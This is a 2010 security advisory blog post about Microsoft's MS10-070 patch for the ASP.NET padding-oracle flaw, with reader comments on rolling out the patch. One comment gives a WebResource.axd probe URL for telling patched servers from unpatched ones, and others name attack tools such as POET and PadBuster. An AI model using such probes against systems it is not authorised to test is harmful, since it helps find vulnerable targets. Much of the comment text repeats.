Internet Storm Center
Training
Certification
Cyber Security Graduate School
Security Awareness Training
Computer Forensics
Penetration Testing
IT Audit
Software Security
MS10-070 OOB Patch for ASP.NET vulnerability
Published: 2010-09-28,
Last Updated: 2010-09-30 00:20:37 UTC
by Daniel Wesemann (Version: 5)
27 comment(s)
Last Updated: 2010-09-30 00:20:37 UTC
by Daniel Wesemann (Version: 5)
Microsoft Bulletin MS10-070 has been released. An update is now available that addresses the ASP.NET "information disclosure" vulnerability (CVE-2010-3332) that we reported on earlier
The core pieces in the advisory are probably in the sections that read
"In Microsoft .NET Framework 3.5 Service Pack 1 and above, this vulnerability can be used by an attacker to retrieve the contents of any file within the ASP.NET application, including web.config" and "This vulnerability can also be used for data tampering, which, if successfully exploited, could be used to decrypt and tamper with the data encrypted by the server."
Translated, this means that the vulnerability undermines basic web application security. I suspect that online shops and such might rate the risk that "an attacker can read any file" on their web application server a bit higher than just "important".
According to the bulletin, MSFT are aware of "active attacks".
In combination, this sure sounds like PATCH NOW! to me.
Update 1800UTC: If you're wondering what a "Padding Oracle" is, the original attack is described very well in this research paper .
Update 1830UTC: Changing InfoCon to YELLOW, to raise awareness for this problem and patch. We'll go back to GREEN in 24hrs unless significant new information develops.
Update 00:13 UTC: Changing InfoCon back to Green. Most people should be well and truly aware of the issue. We may raise it again if we receive reports of widespread use or other changes.
Comments
yeah, like Microsoft would release an "important" patch out of band...
posted by Ken, Tue Sep 28 2010, 17:25
My favorite part of the bulletin. "Why are the updates only available from the Microsoft Download Center? Due to the active attacks currently exploiting this vulnerability and the severity of potential loss of data, we are releasing these updates to the Microsoft Download Center so that customers can begin updating their systems as soon as possible. These updates will also be provided through our other standard distribution methods once testing has been completed to ensure distribution will be successful through these channels." In a nutshell, there is no support yet for using DSUW, WU, MU, SMS ITMU, or anything else to deploy these patches. It's not a big deal for workstations, since you shouldn't be running IIS on workstations and should be shields up 24x7 even on your internal LAN on your workstations. And for servers, you can always get something pushed out to the boxes you know are running ASP.NET.
so, is this officially "PATCH NOW" or not??
@dt, yes it is. You mileage might vary though - the patch is only available through Download Center for now, and not yet via the automated channels. But if you have a valuable internet facing server that is affected by the vulnerability, yes, *test* and then patch asap.
27 different downloads, targeting .Net 1.1 through 4.0 on x86, x64, and IA64. Download Center ridiculousness. And you can’t do a rolling upgrade on a web farm! The patch changes the length of encrypted strings, especially in WebResource.axd files, so unpatched machines can’t concurrently run on the same farm as patched machines.
http://isc.sans.edu/images/status.gif is still green...
@Ken, if you move away from the PC fast enough, the doppler effect will make it look like yellow. OKOK, you're right, we're working on it :)
@Joey
Where did you get your information about needing to push out the patch all at once or having your farm break? Anyone else know if this is true?.. Trying to decided if should implement this patch or wait for reports of broken farms.
Where did you get your information about needing to push out the patch all at once or having your farm break? Anyone else know if this is true?.. Trying to decided if should implement this patch or wait for reports of broken farms.
Is this still considered a patch now if the two workarounds are in place?
Is this still considered a patch now if the two workarounds are in place?
@arom, see ScottGu's blog for the webfarm info -- http://weblogs.asp.net/scottgu/archive/2010/09/28/asp-net-security-update-now-available.aspx
@Paul
Thank you for the link.
Thank you for the link.
@dave@work: probably not, or not completely (also see ScottGu's blog). One of the authors of the attack, Thai Duong, wrote (9:21 PM Sep 25th at http://twitter.com/thaidn/):
"Another video may prove it all, but I'm tired. So believe it or not, Microsoft workarounds can't prevent the attack. Ask them for the patch!"
In http://netifera.com/research/poet//PaddingOraclesEverywhereEkoparty2010.pdf Thai Duong and Juliano Rizzo wrote:
"POET -> remote code execution -> Cesar’s Token Kidnapping -> ROOT privilege on Windows"
The POET version that supposedly does this, has not yet been released, but if it is true then Microsoft flagging this vuln as "Important" seems not entirely appropriate to me.
Cesar Cerrudo's Token Kidnapping Revenge (privilege escalations and some fixes) are described in this document: http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf
Hopefully MS10-070 properly fixes this ASP.NET vulnerability...
"Another video may prove it all, but I'm tired. So believe it or not, Microsoft workarounds can't prevent the attack. Ask them for the patch!"
In http://netifera.com/research/poet//PaddingOraclesEverywhereEkoparty2010.pdf Thai Duong and Juliano Rizzo wrote:
"POET -> remote code execution -> Cesar’s Token Kidnapping -> ROOT privilege on Windows"
The POET version that supposedly does this, has not yet been released, but if it is true then Microsoft flagging this vuln as "Important" seems not entirely appropriate to me.
Cesar Cerrudo's Token Kidnapping Revenge (privilege escalations and some fixes) are described in this document: http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf
Hopefully MS10-070 properly fixes this ASP.NET vulnerability...
Bit confused around Server 2008 w/ .net 1.1 sp1.
According to microsoft you need to apply kb2416447
And it says that this is supported on the download page:
http://www.microsoft.com/downloads/en/details.aspx?familyid=a7990e61-21fd-4942-9dfe-af7961cb0282&displaylang=en
But it won't run on 2008, and the kb page itself ( http://support.microsoft.com/?kbid=2416447 )has no mention of 2008 support!
Also, the filename says x86, no clarity if there is a seperate x64 version or not.
According to microsoft you need to apply kb2416447
And it says that this is supported on the download page:
http://www.microsoft.com/downloads/en/details.aspx?familyid=a7990e61-21fd-4942-9dfe-af7961cb0282&displaylang=en
But it won't run on 2008, and the kb page itself ( http://support.microsoft.com/?kbid=2416447 )has no mention of 2008 support!
Also, the filename says x86, no clarity if there is a seperate x64 version or not.
Microsoft should sue Jualiano Rizzo and Ekoparty.
@zonky That should be the right download, so not sure why it won't run for you. There won't be a seperate x64 selection for you since .Net 1.1 is 32 bit only and runs on WOW on x64 and IA64. MS probably screwed up the installer package - I'd contact support.
Question, It appears some of our Development systems have more then one version of framework installed, does each respective patch need to be installed?
@Davef. Dave. I haven't got a system handy to confirm, but considering the files are different for each flavour of .net I would have to say "yes you do".
I have published a writeup from an security operations guy perspective on http://cupfighter.net
If you have any data in a web shop inside the webroot that is not safe for customers to see you have a problem before this bug was discovered.
If you use database passwords, then you also has a problem already that needs to be fixed. Windows Integrated authentication has been Microsofts recommendation for 10 years by now (Since SQL Server 2000).
I would say, that this is a patch now only for bad websites. Well designed websites does not have any secret information inside webroot, does not rely on client side data being untampered and information disclosure is only of public available information anyway.
Viewstate is IMHO not any better than a form or cookie where the client can change data at his will. If the stake is high enough, the encryption can always be broken.
If you use database passwords, then you also has a problem already that needs to be fixed. Windows Integrated authentication has been Microsofts recommendation for 10 years by now (Since SQL Server 2000).
I would say, that this is a patch now only for bad websites. Well designed websites does not have any secret information inside webroot, does not rely on client side data being untampered and information disclosure is only of public available information anyway.
Viewstate is IMHO not any better than a form or cookie where the client can change data at his will. If the stake is high enough, the encryption can always be broken.
@Seccubus Thanks for that great summary of the webcast! Really helpful!
Weird thing about the patch downloads. When you click on the download for .NET 2.0 SP2, the page that appears is a download page for 2.0 SP2 AND 3.5 SP1. (but the files being installed are shown as version 2.0.xxxxxx).
But if you click on the download for .NET 3.5 SP1, a separate download appears, targeted at only 3.5 SP1.
That's what I hate about manual downloads, we have to make assumptions about the patch logic. I have a server that has both 2.0 SP2 and 3.5 SP1 installed. My assumption is I install the first patch, then the second...
But if you click on the download for .NET 3.5 SP1, a separate download appears, targeted at only 3.5 SP1.
That's what I hate about manual downloads, we have to make assumptions about the patch logic. I have a server that has both 2.0 SP2 and 3.5 SP1 installed. My assumption is I install the first patch, then the second...
I'm seeing normal updates for .net now at Microsoft Update.
According to http://www.troyhunt.com/2010/09/do-you-trust-your-hosting-provider-and.html (thanks Troy!), how to check whether your ISP has patched your webshop server, enter the following URL in you favorite webbrowser (adjust the hostname, the rest is fine):
http://www.example.com/WebResource.axd?d=zt87v2JeCPKYzqUfGEffpA2
Before patching, if publicly disclosing errors was _not_ disabled (which seems typical), you'll see:
____"Error: Padding is invalid and cannot be removed"____
accompanied by a lot of error-message-chatter mentioning "rijndael", "encrypt", "decrypt" etc. In that case, _after_ patching, you'll see:
____"Error: This is an invalid webresource request"____
and nothing that refers to crypto.
Obviously you'll not be the only one firing such URL's at your webshop. Anxious customers might, and perhaps a couple of scriptkiddies (so expect some extra log lines)...
BTW an ASP.NET server (W2K3) I patched today (.NET 1.1, 2.0 and 3.5) behaved exactly as described above, without any reboots after installing the applicable patches.
If you still think your ASP.NET site (in particular DotNetNuke-based) doesn't need patching, check this out:
Title: POET vs ASP.NET: don't waste time implementing useless workarounds - you should patch ;-)
Movie: http://www.youtube.com/watch?v=mP6mKLh1FBw
Although the POET version that attacks ASP.NET has (AFAIK) not yet been publicly released, others are building similar exploits, some of which _are_ publicly released. For example, see http://www.immunityinc.com/ceu-index.shtml (source: http://twitter.com/nicowaisman) and http://www.gdssecurity.com/l/b/2010/09/28/new-version-of-padbuster-available-for-download/
Personally I wouldn't have changed InfoCon back to green. This might get messy soon...
http://www.example.com/WebResource.axd?d=zt87v2JeCPKYzqUfGEffpA2
Before patching, if publicly disclosing errors was _not_ disabled (which seems typical), you'll see:
____"Error: Padding is invalid and cannot be removed"____
accompanied by a lot of error-message-chatter mentioning "rijndael", "encrypt", "decrypt" etc. In that case, _after_ patching, you'll see:
____"Error: This is an invalid webresource request"____
and nothing that refers to crypto.
Obviously you'll not be the only one firing such URL's at your webshop. Anxious customers might, and perhaps a couple of scriptkiddies (so expect some extra log lines)...
BTW an ASP.NET server (W2K3) I patched today (.NET 1.1, 2.0 and 3.5) behaved exactly as described above, without any reboots after installing the applicable patches.
If you still think your ASP.NET site (in particular DotNetNuke-based) doesn't need patching, check this out:
Title: POET vs ASP.NET: don't waste time implementing useless workarounds - you should patch ;-)
Movie: http://www.youtube.com/watch?v=mP6mKLh1FBw
Although the POET version that attacks ASP.NET has (AFAIK) not yet been publicly released, others are building similar exploits, some of which _are_ publicly released. For example, see http://www.immunityinc.com/ceu-index.shtml (source: http://twitter.com/nicowaisman) and http://www.gdssecurity.com/l/b/2010/09/28/new-version-of-padbuster-available-for-download/
Personally I wouldn't have changed InfoCon back to green. This might get messy soon...
Scott Gu's page referenced above mentions selecting the patches based on the "versions" of .NET you are running, so, yes, you do need to install multiple patches on one server if you're running multiple .NET framework versions. He indicates this is even true for 3.5 and 3.5sp1, that you need to install patches for both apparently if you're running 3.5sp1.
In that case he says order is not relevant; I imagine that applies to all issues of patching order for disparate .NET versions, but it's not perfectly clear.
In that case he says order is not relevant; I imagine that applies to all issues of patching order for disparate .NET versions, but it's not perfectly clear.
Anyone know why they'd release the .NET patches to workstations? WSUS is telling me that every workstation qualifies for one or more of these patches, even though none of them run IIS (except a few in our software development dept). Any ideas?
@GDub the patch is a patch for a .net net flaw, not actually specifically for ASP.Net, although that is the only place this vulnerability actually manifests itself. Any patched .net install that has IIS added (and yes, you can add IIS to a workstation) will expose this vulnerability. Hence MS took the (IMHO correct) decision that all .net installs with the vulnerability should be patched.
New Comments closed for all Diaries older than two(2) weeks
Please send your comments to our Contact Form
Diary Archives
